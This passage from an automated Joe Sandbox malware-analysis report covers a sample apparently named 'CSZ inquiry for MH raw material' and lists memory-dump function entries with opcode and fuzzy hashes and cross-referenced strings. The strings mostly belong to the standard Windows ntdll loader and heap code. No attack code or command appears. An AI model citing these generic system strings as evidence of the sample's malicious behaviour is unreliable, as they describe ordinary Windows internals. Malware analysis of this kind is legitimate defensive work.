                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                        • API String ID: 0-1373925480
                                                                        • Opcode ID: 5b62dc6d9d5e946c446aca1bd62f4d11046a9edb260b298823c850daa9eb15c5
                                                                        • Instruction ID: b297b539a876bb1e076406ca49b973e8bd5868dffd6e8382df7248ec85221c4b
                                                                        • Opcode Fuzzy Hash: 5b62dc6d9d5e946c446aca1bd62f4d11046a9edb260b298823c850daa9eb15c5
                                                                        • Instruction Fuzzy Hash: D84134B19056688BEB21DB95C944BACB7F8FF45348F24085AEC01FB3D1D7348985CB21
                                                                        Strings
                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00E44888
                                                                        • LdrpCheckRedirection, xrefs: 00E4488F
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 00E44899
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-3154609507
                                                                        • Opcode ID: b2b4c789e5b50d7cff866995be9426dbfcab10f1d88f25237facc8352f06ccf0
                                                                        • Instruction ID: f5fb1b1913a9d238f6f99a59d72da9967bd10ad1b7c47107f638a2213a998865
                                                                        • Opcode Fuzzy Hash: b2b4c789e5b50d7cff866995be9426dbfcab10f1d88f25237facc8352f06ccf0
                                                                        • Instruction Fuzzy Hash: 8F41D0B2B046609FCB25CF29E844B667BE4AF4D754B05166AFC48B7291E730DC00CB91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-2558761708
                                                                        • Opcode ID: 48a717537de3b6e68eb35c1d81bf94bd429edccadfd1d806bf07b001742dc162
                                                                        • Instruction ID: d7eba2c56ad803737ad0d48412a6fb149f96a4759f231f3979ad2fd10936885b
                                                                        • Opcode Fuzzy Hash: 48a717537de3b6e68eb35c1d81bf94bd429edccadfd1d806bf07b001742dc162
                                                                        • Instruction Fuzzy Hash: 5A11AE323199519FDB18E7149845B7AF7A4EF80725F29812BE4179B291DB30DC84C770
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 00E42104
                                                                        • LdrpInitializationFailure, xrefs: 00E420FA
                                                                        • Process initialization failed with status 0x%08lx, xrefs: 00E420F3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2986994758
                                                                        • Opcode ID: 52c494f034b330420c0fd3eaa2c3ad98d616ae775a9304a6ae7651cfdfed1356
                                                                        • Instruction ID: 0be069f7b19730778d735d958e13691ddbda18f6bbeffb23c3118e3ca2e23b49
                                                                        • Opcode Fuzzy Hash: 52c494f034b330420c0fd3eaa2c3ad98d616ae775a9304a6ae7651cfdfed1356
                                                                        • Instruction Fuzzy Hash: 93F0C271641218BFD724EB5DDC47FAA37A8EB45B58F500069FB00777C1D6B0AE44CAA1
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: #%u
                                                                        • API String ID: 48624451-232158463
                                                                        • Opcode ID: bb4e40099da060effad49eccaab351cbf21996faa615a97080b8d96ae8148da9
                                                                        • Instruction ID: 57cb469dcd74e3c6fe1425f8e418ade19c7aca498b892a7faf3554c827f49eb4
                                                                        • Opcode Fuzzy Hash: bb4e40099da060effad49eccaab351cbf21996faa615a97080b8d96ae8148da9
                                                                        • Instruction Fuzzy Hash: 13715BB1A001499FDB01DFA8D991FAEB7F8EF48304F144066E905F7291EA74EE41CB61
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@
                                                                        • API String ID: 0-149943524
                                                                        • Opcode ID: d76214469751f4ec6db1688dc54fdf0fc2851df308d40ee012c5abebbdd127f6
                                                                        • Instruction ID: fe6c5dfe983b08a9ed7a578065ab20e79bfd4a9227bf2817c0e8f5e8a1b63629
                                                                        • Opcode Fuzzy Hash: d76214469751f4ec6db1688dc54fdf0fc2851df308d40ee012c5abebbdd127f6
                                                                        • Instruction Fuzzy Hash: 79329A705087618BCB249F18D480B3EB7E1EF84744F684A2EF9859B394E734DD80DBA2
                                                                        Strings
                                                                        • LdrResSearchResource Enter, xrefs: 00DCAA13
                                                                        • LdrResSearchResource Exit, xrefs: 00DCAA25
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                        • API String ID: 0-4066393604
                                                                        • Opcode ID: ebe521d95daf516027fa9889eb8fab0565e42d21a288591db470cf8d28179c59
                                                                        • Instruction ID: c4491503a40722a1bd93eef04908f86f5dee6d99f53a32ef7319c15f318e6cdf
                                                                        • Opcode Fuzzy Hash: ebe521d95daf516027fa9889eb8fab0565e42d21a288591db470cf8d28179c59
                                                                        • Instruction Fuzzy Hash: C3E16271A0021AABEF21CEA9DA40FAEB7BAEF14318F14512AF901F7251D774DD40DB61
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction ID: 1b3e96eb0711195ea9cda5297fb8914ecb5b0bebe1162adc7a334becbeb0e87a
                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction Fuzzy Hash: CDC101312043018BEB24EF24C841B6BBBE1EF84318F0C5A3EF59DAA291E775D905CB52
                                                                        Strings
                                                                        • ResIdCount less than 2., xrefs: 00E1EEC9
                                                                        • Failed to retrieve service checksum., xrefs: 00E1EE56
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                        • API String ID: 0-863616075
                                                                        • Opcode ID: a15afa6406dde77afb9e5dffd28ff3057bb9acafe4598d724e3c39c7d87af15e
                                                                        • Instruction ID: dac9d6890b69a3e8bca15adcfde023c1af1b25003de44a52ee0fded61e45a620
                                                                        • Opcode Fuzzy Hash: a15afa6406dde77afb9e5dffd28ff3057bb9acafe4598d724e3c39c7d87af15e
                                                                        • Instruction Fuzzy Hash: 9BE1E1B1908744DFD324CF25C441BABBBE0FB88314F008A2EE5999B391D7719949CF96
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Lm$Lm
                                                                        • API String ID: 0-2222335544
                                                                        • Opcode ID: a6ed0c8efe370a7a344f3c2c593756b076e0fb6d24cef6b29dc2a9649eac0a5e
                                                                        • Instruction ID: 52f10fa91dd5de9e748f6987b99a3aa632b1caa5c3d733ea91db3ca0d201066f
                                                                        • Opcode Fuzzy Hash: a6ed0c8efe370a7a344f3c2c593756b076e0fb6d24cef6b29dc2a9649eac0a5e
                                                                        • Instruction Fuzzy Hash: 94713971E00219AFDF15DF94C981FEEBBB8FB05750F104129F620B6290DB74AA45CBA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 2994545307-634100481
                                                                        • Opcode ID: cffb9a4a03cb31b3372ae7e1680c17f058ddc40f61954dc0e9b9ea3733d5d2f7
                                                                        • Instruction ID: ef6e6451745ca9699193dcf8720ed51c1796e0f6f84f6c08f2117287b0cd45e0
                                                                        • Opcode Fuzzy Hash: cffb9a4a03cb31b3372ae7e1680c17f058ddc40f61954dc0e9b9ea3733d5d2f7
                                                                        • Instruction Fuzzy Hash: 2C613971E002189FDB18DFA88945BAEBBF5FB44704F24506AE649FB391D631A940CB60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$MUI
                                                                        • API String ID: 0-17815947
                                                                        • Opcode ID: b80d7b6ec35bf60321f5748564e1e6a816c9bdff827ee4638bc0c9b31913cb95
                                                                        • Instruction ID: 03d170cb8ef2a91cad45e5fdb2241fcdf3be0605537688ed64168a450141ff5a
                                                                        • Opcode Fuzzy Hash: b80d7b6ec35bf60321f5748564e1e6a816c9bdff827ee4638bc0c9b31913cb95
                                                                        • Instruction Fuzzy Hash: A35147B1E4021DAFDB11DFA5DC85AEEBBB8EB04794F10012AF611B7291D6309E45CB60
                                                                        Strings
                                                                        • kLsE, xrefs: 00DC0540
                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00DC063D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                        • API String ID: 0-2547482624
                                                                        • Opcode ID: ff4f8eb2b8fa2f3309a108b7f0bd54c9f8a8275439a5fcd43c5a285dc8452ba7
                                                                        • Instruction ID: 74cd252ac04ed07a39f3e574893a71cf2750abf190db65205e1342e51049e110
                                                                        • Opcode Fuzzy Hash: ff4f8eb2b8fa2f3309a108b7f0bd54c9f8a8275439a5fcd43c5a285dc8452ba7
                                                                        • Instruction Fuzzy Hash: D5517A71654743CFC724EF68C544BA7BBE4AF88304F08493EE99A87241E774A945CFA2
                                                                        Strings
                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 00DCA309
                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 00DCA2FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                        • API String ID: 0-2876891731
                                                                        • Opcode ID: 20bf9bc1e94232e9b3bdcb1a7c4da85b2bdcd309d5aea07a23c1e56bf442d83f
                                                                        • Instruction ID: 82cf23d82df2ff5ea7d487505949ddb1a53bec057cd9f3554adab6b1d8071a7c
                                                                        • Opcode Fuzzy Hash: 20bf9bc1e94232e9b3bdcb1a7c4da85b2bdcd309d5aea07a23c1e56bf442d83f
                                                                        • Instruction Fuzzy Hash: C441AE31A0469ADBCB11DFA9D850F6977B4FF85708F244069E900EB291E375DD00CB62
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Cleanup Group$Threadpool!
                                                                        • API String ID: 2994545307-4008356553
                                                                        • Opcode ID: 977a01e98f2d1227220f8ea57283365b6d87468a297bf9f687cb2cd78559280b
                                                                        • Instruction ID: 15a254a94fdeb565ba4e826ad3ed9671ba990f47c9d77c8701bdef04fd4d8d1e
                                                                        • Opcode Fuzzy Hash: 977a01e98f2d1227220f8ea57283365b6d87468a297bf9f687cb2cd78559280b
                                                                        • Instruction Fuzzy Hash: BA01D1B2250B04AFE311DF28CD46B2677E8E744715F058939B64CC71A0E334D908CB66
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: MUI
                                                                        • API String ID: 0-1339004836
                                                                        • Opcode ID: f3179c5ef049039c6cbd9fe2714c8c0899fda776e1a469fd42ee27e2b7a763d1
                                                                        • Instruction ID: 383a32004175bc765540cade844a6a88fd9ecb099a2181f3b4e609b07179f904
                                                                        • Opcode Fuzzy Hash: f3179c5ef049039c6cbd9fe2714c8c0899fda776e1a469fd42ee27e2b7a763d1
                                                                        • Instruction Fuzzy Hash: 50824D75E1021A9FDB24CFA9C880BADB7B6FF48710F28816DE959AB251D7309D41CF60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: P`vRbv
                                                                        • API String ID: 0-2392986850
                                                                        • Opcode ID: ec83e2b059750e7263f058a3e112ff4b1b371d98edbb525cb7feaeb2ad52429c
                                                                        • Instruction ID: 7bde28beaf72aa9e688cbf8dcb8d890f32c7d791479d524cdb0c47d0b1e0f557
                                                                        • Opcode Fuzzy Hash: ec83e2b059750e7263f058a3e112ff4b1b371d98edbb525cb7feaeb2ad52429c
                                                                        • Instruction Fuzzy Hash: BD42F1B1D0425AAEDF28DFB8D8456FDBBB1AF08318F24A01AE551BB290D6748FC1D750
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @[
                                                                        • API String ID: 0-4142845228
                                                                        • Opcode ID: 8872e2778a9a5c1c76f53c4d6d395e230ee2e9fc840ac59ed34672a265c6c489
                                                                        • Instruction ID: 6b1c754560d9b67d15f0e392b76d31583ed0e5f56c7a15c2d9019df4a26de313
                                                                        • Opcode Fuzzy Hash: 8872e2778a9a5c1c76f53c4d6d395e230ee2e9fc840ac59ed34672a265c6c489
                                                                        • Instruction Fuzzy Hash: CC32C371E00259DBCF14EF99D891BAEBBB1FF94714F18002AE845AB391D735AD41CBA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                        • Instruction ID: ddc8b9ebb6082941bcf8e0159329f108406861ad35ab2e00e155cd1e1050b266
                                                                        • Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                        • Instruction Fuzzy Hash: 6B621770D012188FCB98DF9AD4D4AADB7B2FF8C311F708199E9816BB45C7356A16CB60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0
                                                                        • API String ID: 0-4108050209
                                                                        • Opcode ID: c71113a5ef8eb54300f701bf8075092b816a5b6de88ec6d87a9840562d84b8d0
                                                                        • Instruction ID: 9a063ac61a1aba5ae80bd08bc8c16f186e6179fc159a2076f213716b0c93c663
                                                                        • Opcode Fuzzy Hash: c71113a5ef8eb54300f701bf8075092b816a5b6de88ec6d87a9840562d84b8d0
                                                                        • Instruction Fuzzy Hash: 37F18F71608781CFCB25EF26C484A7AB7E1AF88714F18486DF88997241DB34DE45DB72
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: PATH
                                                                        • API String ID: 0-1036084923
                                                                        • Opcode ID: c859d619e28c3414225669ee9ed3e1429e5045272059e1e69a03a5fc44dcf6d5
                                                                        • Instruction ID: 3d8caae0423479583f883f7bcb44f2bbaff5c9c1ffa3b290ec121d64c4841c59
                                                                        • Opcode Fuzzy Hash: c859d619e28c3414225669ee9ed3e1429e5045272059e1e69a03a5fc44dcf6d5
                                                                        • Instruction Fuzzy Hash: B4F16B71E0025A9FCB25DF99D881BBEB7B1FF88700F58812DE445AB251DB349E41CBA1
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: __aullrem
                                                                        • String ID:
                                                                        • API String ID: 3758378126-0
                                                                        • Opcode ID: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                                        • Instruction ID: e4a64de587319ef387c4ccf1a8c4c7e2747e71ffcbabe94c1c0390be1fb062ff
                                                                        • Opcode Fuzzy Hash: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                                        • Instruction Fuzzy Hash: 40418D71F001199BDF18DFB9C8815AEF7F2FF88714B288239E615E7281D634AD548790
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .
                                                                        • API String ID: 0-248832578
                                                                        • Opcode ID: 118dffaa5022f885a124e3a6a7466848e00ca7505badb385f947b698e96e7509
                                                                        • Instruction ID: 5d03ca96e69a0e7f47dc93bb29f65dda5196348b046cb869b42b759c131cc088
                                                                        • Opcode Fuzzy Hash: 118dffaa5022f885a124e3a6a7466848e00ca7505badb385f947b698e96e7509
                                                                        • Instruction Fuzzy Hash: 85E18875D003698BCB24DFADC480ABDB7B1FF44704F54919AE889BB294E7749D82CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 9ad2a5e443852dcc401eb69a0fd0c11b0d7cfd49da7bef990484f2e36a864b91
                                                                        • Instruction ID: b7a66be7a6e8d07376fbacef9e3805b798d8e1792d00f94e68613fb648067c80
                                                                        • Opcode Fuzzy Hash: 9ad2a5e443852dcc401eb69a0fd0c11b0d7cfd49da7bef990484f2e36a864b91
                                                                        • Instruction Fuzzy Hash: F1A11871A0836AEADF38CA658845FFEAFA59F55304F08409DFD87A7281C674CD848B74
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 9f30212936b55de26fb55ec2d23d6e3e3bdc60317aa16f7f2ab4249513cbb628
                                                                        • Instruction ID: 2b60536cf45d009dcc98c146167e225dcc646571e9e21d47466c572b8390c692
                                                                        • Opcode Fuzzy Hash: 9f30212936b55de26fb55ec2d23d6e3e3bdc60317aa16f7f2ab4249513cbb628
                                                                        • Instruction Fuzzy Hash: 57A115F5604268AADF39CA648841BFA67A89F46718F04E499FD4EBB2C1D774CD40CB60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2+
                                                                        • API String ID: 0-516152863
                                                                        • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                        • Instruction ID: c3b050a32c3a73af2e2190b05ecbbbfa550eaed181aa52dd7d0259f7113fed67
                                                                        • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                        • Instruction Fuzzy Hash: A1B10771E0061AAFDF29CFA9C880AADB7B5FF48314F148169EA15B7354D730AD45CBA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: c0ff64eaedcde4f1df09f9ecbcebfb5e327c6965b637665990e4254e6300dcc9
                                                                        • Instruction ID: 07d7a802d9277b2c41ce2142fa2b940efd386a0e779541ec2942046a12115858
                                                                        • Opcode Fuzzy Hash: c0ff64eaedcde4f1df09f9ecbcebfb5e327c6965b637665990e4254e6300dcc9
                                                                        • Instruction Fuzzy Hash: 779182B1A00219AFEB21EF95DC85FAEB7B8EF49B50F100065F600BB191D775AD04CBA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: cb0b2a49c627ab2d372aef99697d2317d18df84fd7d7c18c49dd019f00463f95
                                                                        • Instruction ID: c0cd45573082be71f57a5f3789db7b82c410b3a09574eccd98638433923becde
                                                                        • Opcode Fuzzy Hash: cb0b2a49c627ab2d372aef99697d2317d18df84fd7d7c18c49dd019f00463f95
                                                                        • Instruction Fuzzy Hash: 2C91D275980608ABDB22AB94EC54FEFBBB9EF45780F101025F500B73A1DB349905DBA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: GlobalTags
                                                                        • API String ID: 0-1106856819
                                                                        • Opcode ID: a5b91a9ba36946fea4cfd2468cc5cc4dc87b29b17d61e8ddea0e787f130f9b8c
                                                                        • Instruction ID: 68f9cd9f415ffe6ab6d4c133f0f4a96ed23cf76b7182b9532132e9108d7ec172
                                                                        • Opcode Fuzzy Hash: a5b91a9ba36946fea4cfd2468cc5cc4dc87b29b17d61e8ddea0e787f130f9b8c
                                                                        • Instruction Fuzzy Hash: 0A716C75E0020AAFDF28DFA8D595AEDBBB1BF48748F24D12AE805B7240D7719D41CB60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .mui
                                                                        • API String ID: 0-1199573805
                                                                        • Opcode ID: 32360db105c006a9b5e6292dad1727d26d690d167786821609345232da263446
                                                                        • Instruction ID: 9047641af12172279741c15ddac25cee4f2b384089e5ae37c5e7683c74f23ab1
                                                                        • Opcode Fuzzy Hash: 32360db105c006a9b5e6292dad1727d26d690d167786821609345232da263446
                                                                        • Instruction Fuzzy Hash: 945183B2D80229ABCF15DF99E844AEEB7B5EF04B84F055129F911BB281D7349D01CBB4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Ph
                                                                        • API String ID: 0-1955597793
                                                                        • Opcode ID: f54f9666dba86d377223e532184922e5cbe2d563bba1dff3277c507f09c6a181
                                                                        • Instruction ID: 9c06654ecc62c08097946545dbc9cbd71e55bea01e6175299a36598f16b34159
                                                                        • Opcode Fuzzy Hash: f54f9666dba86d377223e532184922e5cbe2d563bba1dff3277c507f09c6a181
